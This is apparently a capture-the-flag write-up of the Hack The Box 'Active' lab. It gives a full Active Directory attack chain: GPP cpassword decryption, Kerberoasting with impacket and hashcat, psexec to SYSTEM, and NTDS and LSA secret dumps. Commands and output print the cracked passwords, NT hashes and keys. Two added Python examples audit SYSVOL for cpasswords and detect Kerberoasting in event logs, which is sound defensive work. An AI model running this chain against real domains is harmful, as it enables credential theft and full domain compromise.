
HTB - Active

Enumeration


Scope

IP Address: 10.10.10.100

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/all-port-scan

PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ sudo nmap -p- -sU --min-rate 10000 $ip -Pn -oN Nmap/all-port-scan

PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ nmap -p53,88,135,139,389,445 $ip -sCV -oN Nmap/script-scan

PORT    STATE SERVICE       VERSION
53/tcp  open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp  open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-08 10:27:39Z)
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open  microsoft-ds?
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-07-08T10:27:50
|_  start_date: 2024-07-08T10:23:10
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required
* Open ports: 53, 88, 135, 139, 389, 445
* UDP open ports: 53, 88, 123, 389
* Services: DNS - SMB - RPC - Kerberos - LDAP
* Versions: DNS 6.1.7601 - SMB2
* Important notes: Windows Server 2008 R2 SP1 - Domain: active.htb

Enumeration

DNS

I always try a zone transfer if DNS is running on the machine

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ dig axfr active.htb @$ip            

; <<>> DiG 9.19.19-1-Debian <<>> axfr active.htb @10.10.10.100
;; global options: +cmd
; Transfer failed.

RPC

Not much information from rpcclient

rpcclient $> srvinfo
        10.10.10.100   Wk Sv PDC Tim NT     Domain Controller
        platform_id     :       500
        os version      :       6.1
        server type     :       0x80102b

rpcclient $> enumdomusers
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED

SMB

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ smbclient -N -L //$ip                            
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Replication     Disk      
        SYSVOL          Disk      Logon server share 
        Users           Disk      

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ crackmapexec smb $ip -u ''  -p '' --shares              

SMB         10.10.10.100    445    DC               [+] active.htb\: 
SMB         10.10.10.100    445    DC               [+] Enumerated shares
SMB         10.10.10.100    445    DC               Share           Permissions     Remark
SMB         10.10.10.100    445    DC               -----           -----------     ------
SMB         10.10.10.100    445    DC               ADMIN$                          Remote Admin
SMB         10.10.10.100    445    DC               C$                              Default share
SMB         10.10.10.100    445    DC               IPC$                            Remote IPC
SMB         10.10.10.100    445    DC               NETLOGON                        Logon server share 
SMB         10.10.10.100    445    DC               Replication     READ            
SMB         10.10.10.100    445    DC               SYSVOL                          Logon server share 
SMB         10.10.10.100    445    DC               Users 

smbclient and crackmapexec both gave some useful information, and I can see that I have read access on the Replication share

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ crackmapexec smb $ip -u ''  -p '' --shares --share Replication -M spider_plus

<snip>
SPIDER_P... 10.10.10.100    445    DC   [*]     OUTPUT: /tmp/cme_spider_plus

Looking at the share contents, one file caught my attention

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ cat /tmp/cme_spider_plus/10.10.10.100.json       

<snip>
        "active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml": {
            "atime_epoch": "2018-07-21 06:37:44",
            "ctime_epoch": "2018-07-21 06:37:44",
            "mtime_epoch": "2018-07-21 06:38:11",
            "size": "533 Bytes"
<snip>

I hurried to download the file

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ smbclient -N \\\\$ip\\Replication
Anonymous login successful

smb: \> cd active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/

smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> dir
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  Groups.xml                          A      533  Wed Jul 18 16:46:06 2018

                5217023 blocks of size 4096. 219815 blocks available

smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml

getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (1.4 KiloBytes/sec) (average 1.4 KiloBytes/sec

Exploring the content of Groups.xml, there is a user called SVC_TGS and a cpassword field

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ cat Groups.xml                            
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

I think this encrypted blob is a GPP password (GPP stands for Group Policy Preferences)

I can decrypt it with gpp-decrypt

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18
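
Finding these files before anyone else does is the defender's half of this step. The Python below is an added example, not part of this write-up or of any tool mentioned in it: it walks a SYSVOL-style directory tree looking for the six preference files Microsoft documented as able to carry a cpassword attribute, reports every entry that has one, and checks that the value decodes to whole AES blocks once the base64 padding that GPP strips is restored. The temporary directory tree and the Drives.xml are constructed inline; the Groups.xml is the one recovered from the Replication share.

```python
"""Audit Group Policy Preference XML files for embedded cpassword values.

Added example (not from the original write-up). It walks a SYSVOL-style
directory tree, parses the preference files that can carry a cpassword
attribute, and reports every credential-bearing entry it finds.
"""
import base64
import os
import tempfile
import xml.etree.ElementTree as ET

# Preference files Microsoft documented as able to hold a cpassword attribute.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

# Attributes that name the account the password belongs to (varies per file).
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")

# The Groups.xml recovered from the Replication share (copied from the box).
SAMPLE_GROUPS_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
"""

# A constructed, credential-free Drives.xml so the scan also sees a clean file.
SAMPLE_DRIVES_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Drives><Drive name="H:"><Properties action="U" path="\\fileserver\home" letter="H" persistent="1"/></Drive></Drives>
"""


def cpassword_ciphertext_len(cpassword: str) -> int:
    """GPP strips the base64 '=' padding; restore it and return the decoded
    length. A genuine AES-256-CBC blob decodes to a multiple of 16 bytes."""
    padded = cpassword + "=" * (-len(cpassword) % 4)
    return len(base64.b64decode(padded))


def find_cpasswords(root_dir: str) -> list:
    """Return one finding per XML element carrying a cpassword attribute."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for fname in files:
            if fname not in GPP_FILES:
                continue
            path = os.path.join(dirpath, fname)
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                continue  # malformed preference files are skipped here
            for elem in tree.iter():
                cpw = elem.get("cpassword")
                if cpw is None:
                    continue
                account = next((elem.get(a) for a in ACCOUNT_ATTRS
                                if elem.get(a)), "")
                n_bytes = cpassword_ciphertext_len(cpw) if cpw else 0
                findings.append({
                    "file": os.path.relpath(path, root_dir),
                    "account": account,
                    "ciphertext_bytes": n_bytes,
                    "looks_like_aes": n_bytes > 0 and n_bytes % 16 == 0,
                })
    return findings


def build_sample_sysvol() -> str:
    """Write the two sample files into a temporary SYSVOL-like tree."""
    base = tempfile.mkdtemp(prefix="sysvol_")
    prefs = os.path.join(base, "active.htb", "Policies",
                         "{31B2F340-016D-11D2-945F-00C04FB984F9}",
                         "MACHINE", "Preferences")
    for sub, content in (("Groups", SAMPLE_GROUPS_XML),
                         ("Drives", SAMPLE_DRIVES_XML)):
        os.makedirs(os.path.join(prefs, sub))
        with open(os.path.join(prefs, sub, f"{sub}.xml"), "w",
                  encoding="utf-8") as fh:
            fh.write(content)
    return base


def audit_sample() -> list:
    """Scan the constructed tree; one finding (SVC_TGS) is expected."""
    return find_cpasswords(build_sample_sysvol())


if __name__ == "__main__":
    for f in audit_sample():
        print(f"{f['file']}: account={f['account']} "
              f"cpassword={f['ciphertext_bytes']} bytes "
              f"(AES-sized: {f['looks_like_aes']})")
```

Point `find_cpasswords` at a mounted copy of the SYSVOL share instead of the temporary tree. A non-empty result means the password is recoverable by anyone who can read SYSVOL, because the AES key used for cpassword is public; the fix is to delete the preference item and rotate that account's password. MS14-025 stopped Group Policy from writing new cpasswords but did not remove existing ones, which is why a scan like this is still worthwhile.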

So we got credentials active.htb\SVC_TGS:GPPstillStandingStrong2k18. Let's verify them with crackmapexec

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ crackmapexec smb $ip -u 'SVC_TGS'  -p 'GPPstillStandingStrong2k18'

SMB    10.10.10.100  445    DC   [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18 

Initial Access


  • We don't have any remote access to the machine, so I will do two things:

    • Explore the shares with the credentials we found

    • Fire up bloodhound-python and enumerate the domain with the credentials we found

First: list all the shares to see if we have read or write access to any of them, and explore them with crackmapexec's spider_plus module, which saves a lot of time

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]                                                                                
└─$ crackmapexec smb $ip -u 'SVC_TGS'  -p 'GPPstillStandingStrong2k18' --shares

SMB         10.10.10.100    445    DC               [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18                               
SMB         10.10.10.100    445    DC               [+] Enumerated shares                                                           
SMB         10.10.10.100    445    DC               Share           Permissions     Remark                                          
SMB         10.10.10.100    445    DC               -----           -----------     ------                                          
SMB         10.10.10.100    445    DC               ADMIN$                          Remote Admin                                    
SMB         10.10.10.100    445    DC               C$                              Default share                                   
SMB         10.10.10.100    445    DC               IPC$                            Remote IPC                                      
SMB         10.10.10.100    445    DC               NETLOGON        READ            Logon server share                              
SMB         10.10.10.100    445    DC               Replication     READ
SMB         10.10.10.100    445    DC               SYSVOL          READ            Logon server share                              
SMB         10.10.10.100    445    DC               Users           READ

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ crackmapexec smb $ip -u 'SVC_TGS'  -p 'GPPstillStandingStrong2k18' --shares -M spider_plus
SMB         10.10.10.100    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18 
SPIDER_P... 10.10.10.100    445    DC               [*] Started spidering plus with option:
SPIDER_P... 10.10.10.100    445    DC               [*]        DIR: ['print$']
SPIDER_P... 10.10.10.100    445    DC               [*]        EXT: ['ico', 'lnk']
SPIDER_P... 10.10.10.100    445    DC               [*]       SIZE: 51200
SPIDER_P... 10.10.10.100    445    DC               [*]     OUTPUT: /tmp/cme_spider_plus

After exploring the JSON file that crackmapexec produced, I didn't find anything except the user flag

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ cat /tmp/cme_spider_plus/10.10.10.100.json

<snip>
        "SVC_TGS/Desktop/user.txt": {
            "atime_epoch": "2018-07-21 10:49:25",
            "ctime_epoch": "2018-07-21 10:49:25",
            "mtime_epoch": "2024-07-08 06:24:13",
            "size": "34 Bytes"
        },
        "desktop.ini": {
            "atime_epoch": "2009-07-14 00:57:55",
            "ctime_epoch": "2009-07-14 00:57:55",
            "mtime_epoch": "2018-07-16 17:01:17",
            "size": "174 Bytes"
<snip>
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ smbclient -U SVC_TGS \\\\$ip\\Users
Password for [WORKGROUP\SVC_TGS]:

smb: \> cd SVC_TGS
smb: \SVC_TGS\> cd Desktop
smb: \SVC_TGS\Desktop\> get user.txt

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ cat user.txt                                     
f709db3ff2f43edafbbbe37523313a6f

User Flag: f709db3ff2f43edafbbbe37523313a6f


Privilege Escalation

Before we run BloodHound, let's update /etc/hosts so that bloodhound-python runs without issues

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ sudo sh -c "echo  '$ip active.htb dc.active.htb' >> /etc/hosts"

Collecting information about the domain

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ bloodhound-python -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -ns $ip -d active.htb -c all

INFO: Found AD domain: active.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.active.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.active.htb
INFO: Found 5 users
INFO: Found 41 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.active.htb
INFO: Done in 00M 19S

Prepare a zip file to upload to BloodHound

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ zip active.zip *.json         
  adding: 20240708065240_computers.json (deflated 70%)
  adding: 20240708065240_containers.json (deflated 93%)
  adding: 20240708065240_domains.json (deflated 76%)
  adding: 20240708065240_gpos.json (deflated 85%)
  adding: 20240708065240_groups.json (deflated 94%)
  adding: 20240708065240_ous.json (deflated 64%)
  adding: 20240708065240_users.json (deflated 89%)

Start the neo4j database and run the BloodHound GUI

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ sudo neo4j start                            
[sudo] password for kali: 
Directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
logs:         /etc/neo4j/logs
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import
data:         /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:110854). It is available at http://localhost:7474
There may be a short delay until the server is ready.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ bloodhound

When running the Kerberoastable accounts query, I found that the Administrator account has an SPN, so its ticket can be obtained with a Kerberoasting attack, which only helps if the password is weak enough to be cracked

Verify with GetUserSPNs.py from the impacket toolkit

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ impacket-GetUserSPNs active.htb/SVC_TGS:'GPPstillStandingStrong2k18' -dc-ip $ip         
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2024-07-08 06:24:15.286149

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ impacket-GetUserSPNs active.htb/SVC_TGS:'GPPstillStandingStrong2k18' -dc-ip $ip -request-user administrator

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2024-07-08 06:24:15.286149             

[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$c233cdd02329afd2b7649d5184cc54db$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

You can use -o to write the hash to a file, but I didn't

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ hashcat -m 13100 admin.hash /usr/share/wordlists/rockyou.txt 

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$c233cdd02329afd2b7649d5184cc54db$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:Ticketmaster1968

Session..........: hashcat
Status...........: Cracked
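
The TGS request that GetUserSPNs.py makes is recorded on the domain controller as Security event 4769, and the `$23$` in the hash is the RC4 encryption type (0x17) that hashcat mode 13100 cracks. The Python below is an added example, not from this write-up or from impacket: it takes records shaped like 4769 events (constructed here, including a made-up requester address; a real run would read them from the event log or a SIEM), flags successful RC4 service-ticket requests for user-backed service accounts, and counts how many distinct service accounts each requester touched.

```python
"""Flag Kerberoasting-style service-ticket requests in Windows event 4769 data.

Added example (not from the write-up or from impacket). The records are
constructed to match the fields of Security event 4769, "A Kerberos service
ticket was requested"; a real deployment would read them from the event
log or a SIEM.
"""
from collections import defaultdict

# TicketEncryptionType values as logged in 4769. 0x17 is RC4-HMAC (etype 23),
# the "$krb5tgs$23$" prefix in the write-up and what hashcat -m 13100 cracks.
RC4_ETYPES = {"0x17", "0x18"}

# Constructed sample events (not real log data). 10.10.14.5 is a made-up
# requester address; the DC and ACTIVE.HTB names come from the box.
SAMPLE_4769 = [
    {"TimeCreated": "2024-07-08T10:31:02Z", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "Administrator", "TicketEncryptionType": "0x17",
     "TicketOptions": "0x40810000", "IpAddress": "10.10.14.5", "Status": "0x0"},
    {"TimeCreated": "2024-07-08T10:31:02Z", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12",
     "TicketOptions": "0x40810000", "IpAddress": "10.10.14.5", "Status": "0x0"},
    {"TimeCreated": "2024-07-08T10:31:05Z", "TargetUserName": "DC$@ACTIVE.HTB",
     "ServiceName": "DC$", "TicketEncryptionType": "0x12",
     "TicketOptions": "0x40810000", "IpAddress": "10.10.10.100", "Status": "0x0"},
    {"TimeCreated": "2024-07-08T10:31:09Z", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "Administrator", "TicketEncryptionType": "0x17",
     "TicketOptions": "0x40810000", "IpAddress": "10.10.14.5", "Status": "0x7"},
]


def is_user_backed_service(service_name: str) -> bool:
    """Machine accounts (trailing $) and krbtgt have random keys that no
    wordlist will crack; only user accounts with SPNs are worth flagging."""
    return not (service_name.endswith("$") or service_name.lower() == "krbtgt")


def is_kerberoast_candidate(event: dict) -> bool:
    """A successful RC4 service ticket for a user-backed service account is the
    Kerberoast signature: current clients negotiate AES, so RC4 here means the
    requester asked for it (as GetUserSPNs.py does) or the account is RC4-only."""
    return (event["Status"] == "0x0"
            and event["TicketEncryptionType"] in RC4_ETYPES
            and is_user_backed_service(event["ServiceName"]))


def detect_kerberoast(events: list) -> list:
    """Return the events that match the Kerberoast signature."""
    return [e for e in events if is_kerberoast_candidate(e)]


def services_per_requester(events: list) -> dict:
    """Count distinct user-backed service accounts each principal asked tickets
    for. One requester sweeping many SPN accounts in a short window is the same
    tool pattern even when the tickets come back AES-encrypted."""
    seen = defaultdict(set)
    for e in events:
        if e["Status"] == "0x0" and is_user_backed_service(e["ServiceName"]):
            seen[e["TargetUserName"]].add(e["ServiceName"])
    return {user: len(svcs) for user, svcs in seen.items()}


if __name__ == "__main__":
    for e in detect_kerberoast(SAMPLE_4769):
        print(f"{e['TimeCreated']} {e['TargetUserName']} from {e['IpAddress']} "
              f"got an RC4 TGS for {e['ServiceName']}")
    print(services_per_requester(SAMPLE_4769))
```

Event 4769 is only written when the "Audit Kerberos Service Ticket Operations" subcategory is enabled on the domain controllers. The longer-term fix is to give SPN-bearing accounts long random passwords (or use group managed service accounts) and to remove RC4 from their msDS-SupportedEncryptionTypes, so the RC4 signature becomes impossible rather than merely detectable.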

We can now access the machine with psexec.py

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ impacket-psexec active.htb/administrator@$ip                                                      
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file CBbnwhxB.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service zrRP on 10.10.10.100.....
[*] Starting service zrRP.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system
C:\Users\Administrator\Desktop> type root.txt
1457083f7ac23289ea1098e5d56b170a

Root Flag: 1457083f7ac23289ea1098e5d56b170a

Optional

We can dump the NTDS database and the LSA secrets

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ crackmapexec smb $ip -u 'administrator'  -p 'Ticketmaster1968' --ntds
SMB         10.10.10.100    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\administrator:Ticketmaster1968 (Pwn3d!)
SMB         10.10.10.100    445    DC               [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         10.10.10.100    445    DC               Administrator:500:aad3b435b51404eeaad3b435b51404ee:5ffb4aaaf9b63dc519eca04aec0e8bed:::
SMB         10.10.10.100    445    DC               Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.10.100    445    DC               krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b889e0d47d6fe22c8f0463a717f460dc:::
SMB         10.10.10.100    445    DC               active.htb\SVC_TGS:1103:aad3b435b51404eeaad3b435b51404ee:f54f3a1d3c38140684ff4dad029f25b5:::
SMB         10.10.10.100    445    DC               DC$:1000:aad3b435b51404eeaad3b435b51404ee:e7d22f7ed282e717e70932379c13647f:::
SMB         10.10.10.100    445    DC               [+] Dumped 5 NTDS hashes to /home/kali/.cme/logs/DC_10.10.10.100_2024-07-08_071457.ntds of which 4 were added to the database

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Active]
└─$ crackmapexec smb $ip -u 'administrator'  -p 'Ticketmaster1968' --lsa
SMB         10.10.10.100    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\administrator:Ticketmaster1968 (Pwn3d!)
SMB         10.10.10.100    445    DC               [+] Dumping LSA secrets
SMB         10.10.10.100    445    DC               ACTIVE\DC$:aes256-cts-hmac-sha1-96:79b6d316156d3adda6dac63d42c62e39defdb0fe596ba9a67d958f8a2244a3cb
SMB         10.10.10.100    445    DC               ACTIVE\DC$:aes128-cts-hmac-sha1-96:a097c725db114d4e9912c88a6a4802b9
SMB         10.10.10.100    445    DC               ACTIVE\DC$:des-cbc-md5:4fec461f26b3b983
SMB         10.10.10.100    445    DC               ACTIVE\DC$:plain_password_hex:56439006925cc9699de9fad166e23f6c756cbe57a31d2cbf4e0651b501079bde4e55914516fa162b7f43ecaecc7df69e7d29daa58a4fbe3a1ac10c2d75f5aee35b0a5b38b9f9dc436f5285a0a9b6c87bf1985892067f5b16c844d11ba8cb81f2740ada2e816ba55cde13439e296ab577e8366135f5e493ff00bc38ebe5fdc0b774fb53d627ce1e4481635732cd8300bc107bf9d9db260cf4b41079cc0b59f95b714a3d6d31262c4eb20b3be09424f8b5da292a72cb3f41277ad78283dca948583ea7a8ede269f057aa8196f42088e2075067a3139800c48b38e8518629d0391a24f20e3a121998d958daf80231a3f229
SMB         10.10.10.100    445    DC               ACTIVE\DC$:aad3b435b51404eeaad3b435b51404ee:e7d22f7ed282e717e70932379c13647f:::
SMB         10.10.10.100    445    DC               (Unknown User):ROOT#123
SMB         10.10.10.100    445    DC               dpapi_machinekey:0x377bd35be67705f345dabf00d3181e269e0fb1e6
dpapi_userkey:0x7586c391e559565c85cb342d1d24546381f0d5cb
SMB         10.10.10.100    445    DC               NL$KM:cc6fb846c30c58052ff2072edae6bf7d6063f689e70ed5d522ee54da63125bb5d8da0bb7820e3de19d7a0315085cb0aeef6391b96c8765a8146295bc77697708
SMB         10.10.10.100    445    DC               [+] Dumped 8 LSA secrets to /home/kali/.cme/logs/DC_10.10.10.100_2024-07-08_071400.secrets and /home/kali/.cme/logs/DC_10.10.10.100_2024-07-08_071400.cached